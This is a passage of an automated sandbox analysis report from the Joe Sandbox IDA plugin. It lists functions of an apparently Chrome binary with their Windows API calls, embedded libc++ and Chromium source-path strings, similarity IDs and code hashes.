                                                    • API ID: ExclusiveLock$Acquire$CurrentReleaseThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 1385397084-2888085009
                                                    • Opcode ID: 2ab0beff1033938dac5775595e4bab81fb929913ef459c898b5f1b83b1e241f0
                                                    • Instruction ID: d9634c00f966c802365dd48648e82f2e06069a40274b385d6564e023da72dc07
                                                    • Opcode Fuzzy Hash: 2ab0beff1033938dac5775595e4bab81fb929913ef459c898b5f1b83b1e241f0
                                                    • Instruction Fuzzy Hash: 9251E6B19003158FDB14DF68D885A6ABBF4FF48315F094669EC46AB352E770E908CFA1
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00D540B5
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D540EF
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D54160
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00D541C4
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value, xrefs: 00D5410A
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                    • String ID: ..\..\third_party\libc++\src\include\optional:795: assertion this->has_value() failed: optional operator* called on a disengaged value
                                                    • API String ID: 374826692-2004180939
                                                    • Opcode ID: 65d53c3f8367c88bfc8c4bf84917380f16fcfe8e5d4eab1cf1fcb15d93b7c3ab
                                                    • Instruction ID: 8f2d36760e2f0b25a68a0a4135d8e496064a673447676921205cf2afe54c0eb2
                                                    • Opcode Fuzzy Hash: 65d53c3f8367c88bfc8c4bf84917380f16fcfe8e5d4eab1cf1fcb15d93b7c3ab
                                                    • Instruction Fuzzy Hash: D4517471604344AFC718DF28D885A2AB7F5FF88305F15896DF9899B7A2D730E848CB52
                                                    APIs
                                                    • _strlen.LIBCMT ref: 00E58A26
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E58A84
                                                    Strings
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                    • String ID: %s%s %s$[%03u.%03u] $[printf format error]
                                                    • API String ID: 2172594012-104471065
                                                    • Opcode ID: 23759a88dcc45238465a212a5082dc9b72efb1aab0f37aa8afb43b7315510c6d
                                                    • Instruction ID: a565b8e6ab765448f10246e0fd6f87abb14c5c5abe5118f0188262bb952fa64a
                                                    • Opcode Fuzzy Hash: 23759a88dcc45238465a212a5082dc9b72efb1aab0f37aa8afb43b7315510c6d
                                                    • Instruction Fuzzy Hash: AB41F8F2D00340ABD704AF249C46A6BB7A9EFC4310F049A3DF959B6282EF71D5548B92
                                                    APIs
                                                    • CreateFileW.KERNEL32 ref: 00E71139
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,debug.log,00000009,?), ref: 00E71175
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00E711BF
                                                    • CreateFileW.KERNEL32 ref: 00E7129B
                                                    Strings
                                                    Similarity
                                                    • API ID: File$Create$CurrentDirectoryModuleName
                                                    • String ID: debug.log
                                                    • API String ID: 4120427848-600467936
                                                    • Opcode ID: 027b908d37e40054c14ac2bc867d312b24d1829302e211fb0a66674183b7029c
                                                    • Instruction ID: 016ecb31f66433cb471451482cb5b9b68a52295a5bee0796566e8837747e931e
                                                    • Opcode Fuzzy Hash: 027b908d37e40054c14ac2bc867d312b24d1829302e211fb0a66674183b7029c
                                                    • Instruction Fuzzy Hash: 9D5105706003518FD710EF69DC49B7A77E0AF84708F05929DF659BB2E2EBB09988C791
                                                    APIs
                                                    • GetLongPathNameW.KERNEL32(00D39E2B,00000000,00000000), ref: 00D66B7E
                                                    • GetLongPathNameW.KERNEL32(00D39E2B,00000000,00000000), ref: 00D66BB5
                                                    Strings
                                                    Similarity
                                                    • API ID: LongNamePath
                                                    • String ID: ..\..\base\files\file_util_win.cc$MakeLongFilePath$ScopedBlockingCall
                                                    • API String ID: 82841172-2989128051
                                                    • Opcode ID: 43a933be7f21714c0f5681ef52acbdf25a7b1e64204bd661a9e18211e6e60d2b
                                                    • Instruction ID: e4172d4a17850185f4905321ce0bf3afb4512e3db7d637634f09e691d80ae570
                                                    • Opcode Fuzzy Hash: 43a933be7f21714c0f5681ef52acbdf25a7b1e64204bd661a9e18211e6e60d2b
                                                    • Instruction Fuzzy Hash: A841F5B1A04785AFD700DF20DC4566BBBE8EFD5300F148A1EF8D4A7241E770EA4887A2
                                                    APIs
                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000000,00000080,00000000), ref: 00D75B26
                                                    Strings
                                                    • CreateFile , xrefs: 00D75B78
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D75C05
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D75C0C
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75B66
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$CreateFile
                                                    • API String ID: 823142352-1749892954
                                                    • Opcode ID: 4674702dc51613e65a2e8288d52085103d435dea75dd0884e1400ed03ef32030
                                                    • Instruction ID: 2edc00a4a53911582d16ae0ee3089ce323f5c029d1dba70f51c5081a13f849c5
                                                    • Opcode Fuzzy Hash: 4674702dc51613e65a2e8288d52085103d435dea75dd0884e1400ed03ef32030
                                                    • Instruction Fuzzy Hash: 3F31BC70600358AFEB21EB60EC85F7A7769EB45704F0485A5F90DBB285F7709E48CB62
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,00D324DD,?,?,?,?,?,?,?,?,ECFE467E), ref: 00DA8B10
                                                    • SetLastError.KERNEL32(?), ref: 00DA8B31
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00D324DD,?,?,?,?,?,?,?,?,ECFE467E), ref: 00DA8BBA
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00DA8BC6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: ce892a84b526ade2c517942ab7d9d448a78fe31d94086f256e22e2bd3b55c128
                                                    • Instruction ID: dba59899ee53889f3f8586de2908d763bec55cec324b3dc1e4a578c323a43cbf
                                                    • Opcode Fuzzy Hash: ce892a84b526ade2c517942ab7d9d448a78fe31d94086f256e22e2bd3b55c128
                                                    • Instruction Fuzzy Hash: B4318EB4500344DFCB209F64D885A6ABBB1FF0A300F144469E986AB362DB30D844DBB2
                                                    APIs
                                                    • GetLastError.KERNEL32 ref: 00D3D22D
                                                    • SetLastError.KERNEL32(?), ref: 00D3D24D
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D3D2B3
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D3D2BF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: c8989cb1592dc5560a8503f85d6391468b30832b909d067056cb641c5e7b02a3
                                                    • Instruction ID: 28c3fb42d064ab5991495b203a0049ba02475ac0109af202c3a2b3317364efd6
                                                    • Opcode Fuzzy Hash: c8989cb1592dc5560a8503f85d6391468b30832b909d067056cb641c5e7b02a3
                                                    • Instruction Fuzzy Hash: 2B31E174A00345DFDB10AF64E889B6B7BB6EF0A300F140429F582AB361D631D844CFBA
                                                    APIs
                                                    • GetLastError.KERNEL32(00000000,?,00D417F8,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D41947
                                                    • SetLastError.KERNEL32(?,?,?,?,?,00D417F8,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D41967
                                                    • GetModuleHandleW.KERNEL32(00000000,?,00D417F8,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D419CD
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D419D9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: 7395768addbcad47d106a337c8375163a63a1e653b7106ac0cd88eec0fcf2dcd
                                                    • Instruction ID: e1818d9ca1ff188c6e147d22b322147159fd34ff1ee456b422f2893327a181ca
                                                    • Opcode Fuzzy Hash: 7395768addbcad47d106a337c8375163a63a1e653b7106ac0cd88eec0fcf2dcd
                                                    • Instruction Fuzzy Hash: 7331D038600345DFCB10AF64D899B6A7BF1EB09300F180819F596AB361D7319885CFB2
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?), ref: 00D3C382
                                                    • SetLastError.KERNEL32(00000000,?,?,?,?,?), ref: 00D3C3A2
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,?), ref: 00D3C3ED
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D3C3F9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$AddressHandleModuleProc
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 1762409328-1090674830
                                                    • Opcode ID: c07b135b381952631cf791b4e7971587baed0db9eafbd579838bd00eca5fb975
                                                    • Instruction ID: b0bbbf22f04148f7b84c4ac8db6b01c1286a1cca2f3a43ca9c47b390051a8a30
                                                    • Opcode Fuzzy Hash: c07b135b381952631cf791b4e7971587baed0db9eafbd579838bd00eca5fb975
                                                    • Instruction Fuzzy Hash: 69217C715103459FCB20AFA5EC89B2E77B5EB45301F185829F646FB261EB31A844CB72
                                                    APIs
                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,ECFE467E,E0000008,?,00000000,00EC0F0F,000000FF,?,00E35FB7,?,?,00E36053,00E57B4F), ref: 00E35F2B
                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00E35F3D
                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00EC0F0F,000000FF,?,00E35FB7,?,?,00E36053,00E57B4F), ref: 00E35F5F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 3ebc181f7b36b708e3c092af593811aa951d53580cde54c2024776cb58d6ecc5
                                                    • Instruction ID: 11c377f2e6fa2581db03a8f6707552ca07794ec12a2286a059e4c84dc384c993
                                                    • Opcode Fuzzy Hash: 3ebc181f7b36b708e3c092af593811aa951d53580cde54c2024776cb58d6ecc5
                                                    • Instruction Fuzzy Hash: B601F232A44699AFCB218F50CC08FAEBBB8FB04B14F05052DF821B6290DB749908CA80
                                                    APIs
                                                    • GetProcessId.KERNEL32(00000000,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D417B8
                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,FFFFFFFF,00000000,?,00D40F01), ref: 00D417E3
                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,?,00D40F01), ref: 00D4181A
                                                    • GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,?,00D40F01), ref: 00D41822
                                                    • GetLastError.KERNEL32(?,FFFFFFFF,00000000,?,00D40F01), ref: 00D4182A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$ErrorLastTimes
                                                    • String ID:
                                                    • API String ID: 2562579171-0
                                                    • Opcode ID: 12f712b625931c0d7614d8d6798d5747db5da644b42b86c716f082b5e98e5e34
                                                    • Instruction ID: 4f42f050f220cf8f5e615b5b85a94a712628c6cbd741cb920534342fcbc6b27d
                                                    • Opcode Fuzzy Hash: 12f712b625931c0d7614d8d6798d5747db5da644b42b86c716f082b5e98e5e34
                                                    • Instruction Fuzzy Hash: 4221C374A0025D9FCB249F65D8986BF7BE9EF44300F18482DE146EB240EB24AD88C7B1
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00DEF20A
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00DEF1FB
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00DEF219
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4218353326-2665691617
                                                    • Opcode ID: a722634ebc1d0cc4ea4e4cb9aea509fe4ddac9021e15a48bfbcd0639df46c011
                                                    • Instruction ID: 8748c87f33f53ed7d29bbac0115333b5ea044f575a790a9f0267f490d1fa108c
                                                    • Opcode Fuzzy Hash: a722634ebc1d0cc4ea4e4cb9aea509fe4ddac9021e15a48bfbcd0639df46c011
                                                    • Instruction Fuzzy Hash: 23715F75B0025A8FCB18EB6AC9919BEB7F2FF84310B288029D455E7791D730ED41CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00DA8047
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00000021,?,00004000,?,000000FF), ref: 00DA8170
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: first$second
                                                    • API String ID: 17069307-3095674784
                                                    • Opcode ID: 19691db12cb54da4495800892d2e408e96362b174c5300c50d0ee0b810d9500c
                                                    • Instruction ID: d6d5150b39bc9b819e09f59406b1cea894dfabc7afe9e12f58360cbca2b66758
                                                    • Opcode Fuzzy Hash: 19691db12cb54da4495800892d2e408e96362b174c5300c50d0ee0b810d9500c
                                                    • Instruction Fuzzy Hash: BB51D0716047019FC314CF29C880A6AFBE5FF89324F15CA2DF99997295DB30E946CBA1
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,00D52E86,00000000,00000000), ref: 00D53136
                                                    • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,00000000,?,?,00D52E86,00000000,00000000), ref: 00D53155
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at,?,?,?,?,?,00000000,00000000,?,?,00D52E86,00000000,00000000), ref: 00D53283
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at, xrefs: 00D532B8
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:40: assertion __location != nullptr failed: null pointer given to construct_at
                                                    • API String ID: 1678258262-2888085009
                                                    • Opcode ID: 36e34df80c42a2b701e80f88bec6609f1b37a7a0217074086bcad836bd4c93c4
                                                    • Instruction ID: 4b27d3f9f53b17cd28b78efcdd40969c9e0740ff17ddc49577b80bd520b59c0a
                                                    • Opcode Fuzzy Hash: 36e34df80c42a2b701e80f88bec6609f1b37a7a0217074086bcad836bd4c93c4
                                                    • Instruction Fuzzy Hash: 29514CB5A006059FCF14CF69D880969BBF0FF48391B14812AEC59EB351D730EE59CBA5
                                                    APIs
                                                      • Part of subcall function 00D43410: ResetEvent.KERNEL32(?), ref: 00D4342B
                                                      • Part of subcall function 00D43410: ResetEvent.KERNEL32(?,00000001), ref: 00D434AF
                                                      • Part of subcall function 00D43410: TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D434B9
                                                      • Part of subcall function 00D43410: ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D434FB
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00D423A2), ref: 00D432A7
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D432DD
                                                    Strings
                                                    • ..\..\chrome\app\exit_code_watcher_win.cc, xrefs: 00D4333F
                                                    • StartWatching, xrefs: 00D43344
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireEventReleaseReset
                                                    • String ID: ..\..\chrome\app\exit_code_watcher_win.cc$StartWatching
                                                    • API String ID: 2082994738-1005533984
                                                    • Opcode ID: e99fd5e0da6117f6f6b6f2e8299bd753c47467f6b7afbe81f950afc61ec277f6
                                                    • Instruction ID: 4109de6f6a22f100d83f166b1b218d5ff0646826845b2164bff7fdf97e884989
                                                    • Opcode Fuzzy Hash: e99fd5e0da6117f6f6b6f2e8299bd753c47467f6b7afbe81f950afc61ec277f6
                                                    • Instruction Fuzzy Hash: F351A4706007048FC720DF29D889A56BBE4FF48304B15496DE49A9B762EB70F945CFA1
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00DF6B85
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF10F0), ref: 00DF6BB0
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF10F0), ref: 00DF6BF1
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00DF6D46
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread
                                                    • String ID: ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at
                                                    • API String ID: 135963836-4189810390
                                                    • Opcode ID: b057fb5dc046e15078fcde55c579eedfb7d97a518c6cc6dc39ceda973ca9e809
                                                    • Instruction ID: 6006dd982deecc537d7e414a5fb4015c3fdf587c0147a0853b1291977f3f0adb
                                                    • Opcode Fuzzy Hash: b057fb5dc046e15078fcde55c579eedfb7d97a518c6cc6dc39ceda973ca9e809
                                                    • Instruction Fuzzy Hash: 3751B0709047858BD321CF28C880776BBE4FF95304F159A6EE9DA97352DB70E584CB62
                                                    APIs
                                                    • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000000,00000000), ref: 00D82B92
                                                    Strings
                                                    • GetCurrentDirectoryW, xrefs: 00D82B41
                                                    • ..\..\base\files\file_util_win.cc, xrefs: 00D82B3C
                                                    • ScopedBlockingCall, xrefs: 00D82C90
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: ..\..\base\files\file_util_win.cc$GetCurrentDirectoryW$ScopedBlockingCall
                                                    • API String ID: 1611563598-3482229333
                                                    • Opcode ID: 2c09cc9b18e8d2fef68ef66fb6365ffb9e1fde7e925ac6adf34570d1b095934c
                                                    • Instruction ID: d9098ef1a0d7c97950bae4106432ff519f68b8c49dfc7f02df495e061250382e
                                                    • Opcode Fuzzy Hash: 2c09cc9b18e8d2fef68ef66fb6365ffb9e1fde7e925ac6adf34570d1b095934c
                                                    • Instruction Fuzzy Hash: 9541D5B19043459FD710EF24DC85A6FB7E4EF84740F04892DF8D5A7251E774AA4887A3
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,00D8395C,?,00000000,?,?,?,?,00E8179B), ref: 00D413E0
                                                    • ReleaseSRWLockExclusive.KERNEL32(?,?,00D8395C,?,00000000,?,?,?,?,00E8179B), ref: 00D41410
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: ..\..\base\threading\thread.cc$StopSoon
                                                    • API String ID: 17069307-4240870308
                                                    • Opcode ID: da36a3def254268024d8aba40b2fa1537abf718a82b29dc73db0c75630fb0c18
                                                    • Instruction ID: 1dfa479e4246cfd2572d87383e452139ea86f8b07ba925bba8457fdd123945ac
                                                    • Opcode Fuzzy Hash: da36a3def254268024d8aba40b2fa1537abf718a82b29dc73db0c75630fb0c18
                                                    • Instruction Fuzzy Hash: 6641D3757003448FC710DF29D88492ABBE5FF88714F09495DE85A9B352E770E945CBA2
                                                    APIs
                                                    Strings
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00E71507
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00E71500
                                                    • ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length, xrefs: 00E7150E
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
